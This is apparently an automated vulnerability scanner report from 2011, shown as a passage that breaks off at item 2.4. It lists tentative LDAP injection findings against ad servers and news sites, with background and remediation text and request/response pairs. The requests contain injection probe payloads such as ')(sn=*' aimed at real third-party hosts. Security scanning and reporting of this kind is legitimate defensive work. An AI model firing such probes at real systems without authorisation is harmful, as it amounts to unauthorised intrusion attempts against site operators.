Connection: close

Response 2

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:23:53 GMT
Server: Apache
Set-Cookie: SESS98684d1eb89eae890ac2d30814f7062d=goltn6f70re8ngu8p1kkhfp8r7; expires=Tue, 22-Feb-2011 06:57:13 GMT; path=/; domain=.popsci.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 03:23:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4c D=688223
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
<a href="http://www.bmxmag.biz/existing.php">bmxmag-ps</a> -->

<script>
document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E"));
</script>
<script>
COMSCORE.beacon({
c1:2,
c2:"6035029",
c3:" ",
c4:" ",
c5:"",
c6:"",
c15:" "
});
</script>
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035029&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
 
<script type="text/javascript">
_qoptions={
qacct:"p-cafODhhaQOlCs"
};
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-cafODhhaQOlCs.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>


<script type="text/javascript">
(function () {
var d = new Image(1, 1);
d.onerror = d.onload = function () {
d.onerror = d.onload = null;
};
d.src = ["//secure-us.imrworldwide.com/cgi-bin/m?ci=us-903454h&cg=0&cc=1&si=", escape(window.location.href), "&rp=", escape(document.referrer), "&ts=compact&rnd=", (new Date()).getTime()].join('');
})();
</script>
<noscript>
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-903454h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
</noscript>

<script language="JavaScript"></script>
<script language="JavaScript" src="/sites/all/modules/omniture/s_code.js"></script><scri
...[SNIP]...

2. LDAP injection previous next
There are 26 instances of this issue:

http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 [TargetID parameter]
http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 [TargetID parameter]
http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 [UIT parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [&PID parameter]
http://ad.doubleclick.net/adj/N4478.redactedOX2487/B5084478.4 [AN parameter]
http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 2]
http://click.pulse360.com/cgi-bin/clickthrough.cgi [creative parameter]
http://forums.silverlight.net/forums/53.aspx [ASP.NET_SessionId cookie]
http://login.live.com/login.srf [MUID cookie]
https://login.live.com/ppsecure/secure.srf [wla42 cookie]
http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun [REST URL parameter 4]
http://photoblog.msnbc.redacted/_static/feeds/3147.xml [REST URL parameter 3]
http://rad.redacted/ADSAdClient31.dll [GetSAd parameter]
http://technolog.msnbc.redacted/_news/2010/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name [REST URL parameter 2]
http://technolog.msnbc.redacted/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing- [REST URL parameter 4]
http://technolog.msnbc.redacted/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console [REST URL parameter 1]
http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink [REST URL parameter 5]
http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ [REST URL parameter 1]
http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ [REST URL parameter 5]
http://technolog.msnbc.redacted/_static/feeds/3147.xml [REST URL parameter 3]
http://www.msnbc.redacted/id/32359544/ [REST URL parameter 1]
http://www.polls.newsvine.com/_nv/cms/help/faq [REST URL parameter 3]
http://www.polls.newsvine.com/_nv/cms/info/copyrightPolicy [REST URL parameter 1]
http://www.polls.newsvine.com/_static/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css [REST URL parameter 1]
http://www.polls.newsvine.com/_static/js/5bf8c8108bf4cc6d7732f39059de1eecc395f3a8.js [REST URL parameter 1]
http://www.polls.newsvine.com/_vine/js/pierre [REST URL parameter 2]

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

2.1. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Issue detail

The TargetID parameter appears to be vulnerable to LDAP injection attacks.

The payloads 91b687f6f8a6bf15)(sn=* and 91b687f6f8a6bf15)!(sn=* were each submitted in the TargetID parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=91b687f6f8a6bf15)(sn=*&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:40:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5224

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,335 Template Name = Watermark Banner Creative (Flash) -
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2981993/300x250_PostHoliday_Citrus.swf";
var gif = "http://s0.2mdn.net/2981993/300x250_PostHoliday_Citrus.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/q%3B234336715%3B1-0%3B0%3B57860936%3B4307-300/250%3B40005125/40022912/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/q%3B234336715%3B1-0%3B0%3B57860936%3B4307-300/250%3B40005125/40022912/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3f" + ctVal);
}
if(ctParam.toLowerCase() == "clicktag") {
fscUrl = ctVal;
fscUrlClickTagFound = true;
}
else if(!fscUrlClickTagFound) {
fscUrl = ctVal;
}
fv += "&" + ctParam + "=" + ctVal;
}
}
fv+='&pid=57860936';
fv+='"';
var bgo=(bg=="")?"":'<param name="bgcolor" value="#'+bg+'">';
var bge=(bg=="")?"":' bgcolor="#'+bg+'"';
function FSWin(){if((openWindow=="false")&&(id=="DCF0"))alert('openWindow is wrong.');
var dcw = 800;
var dch = 600;
// IE
if(!window.innerWidth)
{
// st
...[SNIP]...

Request 2

GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=91b687f6f8a6bf15)!(sn=*&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:40:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5236

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,335 Template Name = Watermark Banner Creative (Flash) -
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2981993/300x250_122510_POST_HOL_VORTEX.swf";
var gif = "http://s0.2mdn.net/2981993/300x250_122510_POST_HOL_VORTEX.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/q%3B234336715%3B0-0%3B0%3B57860936%3B4307-300/250%3B40005122/40022909/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/q%3B234336715%3B0-0%3B0%3B57860936%3B4307-300/250%3B40005122/40022909/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3f" + ctVal);
}
if(ctParam.toLowerCase() == "clicktag") {
fscUrl = ctVal;
fscUrlClickTagFound = true;
}
else if(!fscUrlClickTagFound) {
fscUrl = ctVal;
}
fv += "&" + ctParam + "=" + ctVal;
}
}
fv+='&pid=57860936';
fv+='"';
var bgo=(bg=="")?"":'<param name="bgcolor" value="#'+bg+'">';
var bge=(bg=="")?"":' bgcolor="#'+bg+'"';
function FSWin(){if((openWindow=="false")&&(id=="DCF0"))alert('openWindow is wrong.');
var dcw = 800;
var dch = 600;
// IE
if(!window.innerWidth)
{
...[SNIP]...

2.2. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N3382.no_url_specifiedOX2487/B5076164.5

Issue detail

The TargetID parameter appears to be vulnerable to LDAP injection attacks.

The payloads 8d3e8d3d71eda696)(sn=* and 8d3e8d3d71eda696)!(sn=* were each submitted in the TargetID parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8d3e8d3d71eda696)(sn=*&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3003537/TR_Laser_TradeFreeFor60DaysGet500_300x250_100110.swf";
var gif = "http://s0.2mdn.net/3003537/ TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif";
var minV = 10;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/2
...[SNIP]...

Request 2

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8d3e8d3d71eda696)!(sn=*&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5679

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3003537/TR_MobilePro_GetA500AppleGiftCard_300x250_072010.swf";
var gif = "http://s0.2mdn.net/3003537/1- TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&SC=S056001&ch_id=D&s_id=MSN&c_id=GFTCRD&o_id=GFTCRD");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3f" + ctV
...[SNIP]...

2.3. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N3382.no_url_specifiedOX2487/B5076164.5

Issue detail

The UIT parameter appears to be vulnerable to LDAP injection attacks.

The payloads e20e5e04cd95acd2)(sn=* and e20e5e04cd95acd2)!(sn=* were each submitted in the UIT parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=e20e5e04cd95acd2)(sn=*&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3003537/TR_Laser_TradeFreeFor60DaysGet500_300x250_100110.swf";
var gif = "http://s0.2mdn.net/3003537/ TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif";
var minV = 10;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/2
...[SNIP]...

Request 2

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=e20e5e04cd95acd2)!(sn=*&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5679

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3003537/TR_MobilePro_GetA500AppleGiftCard_300x250_072010.swf";
var gif = "http://s0.2mdn.net/3003537/1- TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&SC=S056001&ch_id=D&s_id=MSN&c_id=GFTCRD&o_id=GFTCRD");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3f" + ctV
...[SNIP]...

2.4. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

